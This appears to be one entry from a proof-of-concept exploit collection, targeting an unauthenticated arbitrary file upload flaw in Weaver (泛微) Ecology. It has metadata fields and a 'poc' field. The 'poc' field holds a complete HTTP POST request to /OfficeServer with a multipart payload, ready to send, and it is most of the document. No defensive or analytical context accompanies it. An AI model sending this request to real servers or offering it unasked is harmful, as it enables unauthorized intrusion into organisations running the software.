vendor = "泛微"
name = "泛微Ecology未授权"
type = "任意文件上传"
source = "TG"
date = "08.15"
poc = "POST /OfficeServer HTTP/1.1 Host: Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymVk33liI64J7GQaK Content-Length: 204 ------WebKitFormBoundarymVk33liI64J7GQaK Content-Disposition: form-data; name=\"aaa\" {'OPTION':'INSERTIMAGE','isInsertImageNew':'1','imagefileid4pic':'100'} ------WebKitFormBoundarymVk33liI64J7GQaK—"
label = "nday"
